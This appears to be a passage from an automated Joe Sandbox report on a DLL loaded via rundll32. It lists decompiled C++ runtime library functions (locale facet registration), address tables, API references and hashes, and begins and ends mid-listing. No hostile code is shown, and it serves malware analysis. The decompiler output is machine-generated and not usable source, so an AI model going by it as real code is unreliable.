                          0x6e20f98b
                          0x6e20f989

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F952
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F95C
                          • int.LIBCPMT ref: 6E20F973
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F9AD
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F9CD
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F9EB
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
                          • Instruction ID: ce6fa70b025c62a46b7333a44e3d8e80089853d9f02c56ddcf649cf6b11fcda8
                          • Opcode Fuzzy Hash: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
                          • Instruction Fuzzy Hash: DF11C17991052D9BCB00EBE0C894AEEB77BBF44B18F244909E4106B2D0DB74AA45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E204747, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E204747(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t39;
				intOrPtr* _t44;
				void* _t47;

				E6E2200AC(0x6e26816f, __ebx, __edi, __esi, 0x18);
				E6E206653(_t47 - 0x14, 0);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t44 =  *0x6e2dce7c; // 0x3569090
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				_t18 = E6E1E161C(0x6e2dce90);
				_t35 =  *((intOrPtr*)(_t47 + 8));
				_t19 = E6E1E171B( *((intOrPtr*)(_t47 + 8)), _t18);
				_t46 = _t19;
				if(_t19 != 0) {
					L5:
					E6E2066BA(_t47 - 0x14);
					return E6E220075(_t46);
				} else {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t47 + 8)));
						_push(_t47 - 0x10);
						__eflags = E6E204F5F(__ebx, _t35, __edx, _t44, _t46) - 0xffffffff;
						if(__eflags == 0) {
							_t39 = _t47 - 0x20;
							E6E1E1438(_t39);
							E6E223D74(_t47 - 0x20, 0x6e2c3504);
							asm("int3");
							 *_t39 = __edx;
							return _t39;
						} else {
							_t46 =  *((intOrPtr*)(_t47 - 0x10));
							 *((intOrPtr*)(_t47 - 0x10)) = _t46;
							 *(_t47 - 4) = 1;
							E6E206FD3(__eflags, _t46);
							 *((intOrPtr*)( *_t46 + 4))();
							 *0x6e2dce7c = _t46;
							goto L5;
						}
					} else {
						_t46 = _t44;
						goto L5;
					}
				}
			}








                          0x6e20474e
                          0x6e204758
                          0x6e20475d
                          0x6e204766
                          0x6e20476c
                          0x6e20476f
                          0x6e204774
                          0x6e204778
                          0x6e20477d
                          0x6e204781
                          0x6e2047bc
                          0x6e2047bf
                          0x6e2047cb
                          0x6e204783
                          0x6e204785
                          0x6e20478b
                          0x6e204791
                          0x6e204799
                          0x6e20479c
                          0x6e2047cc
                          0x6e2047cf
                          0x6e2047dd
                          0x6e2047e2
                          0x6e2047e3
                          0x6e2047e7
                          0x6e20479e
                          0x6e20479e
                          0x6e2047a1
                          0x6e2047a5
                          0x6e2047a9
                          0x6e2047b3
                          0x6e2047b6
                          0x00000000
                          0x6e2047b6
                          0x6e204787
                          0x6e204787
                          0x00000000
                          0x6e204787
                          0x6e204785

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20474E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E204758
                          • int.LIBCPMT ref: 6E20476F
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E2047A9
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2047BF
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2047DD
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
                          • Instruction ID: 6873a31d7f9ff45d95f5d602d1511cfdbbcd75cbc473d54ac18203b7e4455c53
                          • Opcode Fuzzy Hash: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
                          • Instruction Fuzzy Hash: 3111E379E0051D9FCB05DBE0C854AEDB7BAAF15714F108918E524AB2D0DBB49A45C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F7FF, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F7FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t374 - 0x14, 0);
				_t357 =  *0x6e2c6dd8; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1E161C(0x6e2c6d84);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E2066BA(_t374 - 0x14);
					return E6E220075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E211339(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t374 - 0x20);
							E6E223D74(_t374 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t348, _t357, 0x14);
							E6E206653(_t374 - 0x14, 0);
							_t358 =  *0x6e2c6db0; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1E161C(0x6e2c6d64);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E2066BA(_t374 - 0x14);
								return E6E220075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E2113A1(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t374 - 0x20);
										E6E223D74(_t374 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t265, _t349, _t358, 0x14);
										E6E206653(_t374 - 0x14, 0);
										_t359 =  *0x6e2c6ddc; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1E161C(0x6e2c6d88);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E2066BA(_t374 - 0x14);
											return E6E220075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E211409(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t374 - 0x20);
													E6E223D74(_t374 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t265, _t350, _t359, 0x14);
													E6E206653(_t374 - 0x14, 0);
													_t360 =  *0x6e2c6de0; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1E161C(0x6e2c6d8c);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E2066BA(_t374 - 0x14);
														return E6E220075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E211471(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t374 - 0x20);
																E6E223D74(_t374 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t265, _t351, _t360, 0x14);
																E6E206653(_t374 - 0x14, 0);
																_t361 =  *0x6e2c6dfc; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1E161C(0x6e2c6da8);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E2066BA(_t374 - 0x14);
																	return E6E220075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E2114EC(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t374 - 0x20);
																			E6E223D74(_t374 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t265, _t352, _t361, 0x14);
																			E6E206653(_t374 - 0x14, 0);
																			_t362 =  *0x6e2c6dcc; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1E161C(0x6e2c6d80);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E2066BA(_t374 - 0x14);
																				return E6E220075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E211558(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t374 - 0x20);
																						E6E223D74(_t374 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t265, _t353, _t362, 0x14);
																						E6E206653(_t374 - 0x14, 0);
																						_t363 =  *0x6e2c6e00; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1E161C(0x6e2c6dac);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E2066BA(_t374 - 0x14);
																							return E6E220075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E2115C4(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t374 - 0x20);
																									E6E223D74(_t374 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t265, _t354, _t363, 0x14);
																									E6E206653(_t374 - 0x14, 0);
																									_t364 =  *0x6e2c6dd0; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1E161C(0x6e2c6d60);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E2066BA(_t374 - 0x14);
																										return E6E220075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E21162A(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1E1438(_t321);
																												E6E223D74(_t374 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e26851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e26c0c4;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E21542F(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E220075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E206FD3(__eflags, _t355);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e2c6dd0 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E206FD3(__eflags, _t354);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e2c6e00 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E206FD3(__eflags, _t353);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e2c6dcc = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E206FD3(__eflags, _t352);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e2c6dfc = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E206FD3(__eflags, _t351);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e2c6de0 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E206FD3(__eflags, _t350);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e2c6ddc = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E206FD3(__eflags, _t349);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e2c6db0 = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E206FD3(__eflags, _t348);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e2c6dd8 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}






























                          0x6e20f7ff
                          0x6e20f7ff
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f830
                          0x6e20f835
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F806
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F810
                          • int.LIBCPMT ref: 6E20F827
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F861
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F881
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F89F
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
                          • Instruction ID: 8688bbfb5126637dbdccf3455e9659dd8b3f6ee28c6a2945f365496b19e5a522
                          • Opcode Fuzzy Hash: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
                          • Instruction Fuzzy Hash: F1110A75D1052DCBCF01EBE0C894AEEB77BAF45B14F240904D4106B2D0DB749A84C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F41B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F41B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t209;
				signed int _t210;
				void* _t222;
				void* _t235;
				void* _t248;
				void* _t261;
				void* _t274;
				void* _t287;
				void* _t300;
				void* _t313;
				void* _t326;
				void* _t339;
				void* _t352;
				void* _t365;
				void* _t378;
				signed int _t549;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				void* _t638;

				_t592 = __edx;
				_t451 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t638 - 0x14, 0);
				_t609 =  *0x6e2c6df0; // 0x0
				 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
				 *(_t638 - 0x10) = _t609;
				_t209 = E6E1E161C(0x6e2c6d9c);
				_t454 =  *((intOrPtr*)(_t638 + 8));
				_t210 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t209);
				_t594 = _t210;
				if(_t210 != 0) {
					L5:
					E6E2066BA(_t638 - 0x14);
					return E6E220075(_t594);
				} else {
					if(_t609 == 0) {
						_push( *((intOrPtr*)(_t638 + 8)));
						_push(_t638 - 0x10);
						__eflags = E6E211057(__ebx, _t454, __edx, _t594, _t609) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t638 - 0x20);
							E6E223D74(_t638 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t594, _t609, 0x14);
							E6E206653(_t638 - 0x14, 0);
							_t610 =  *0x6e2c6dc0; // 0x0
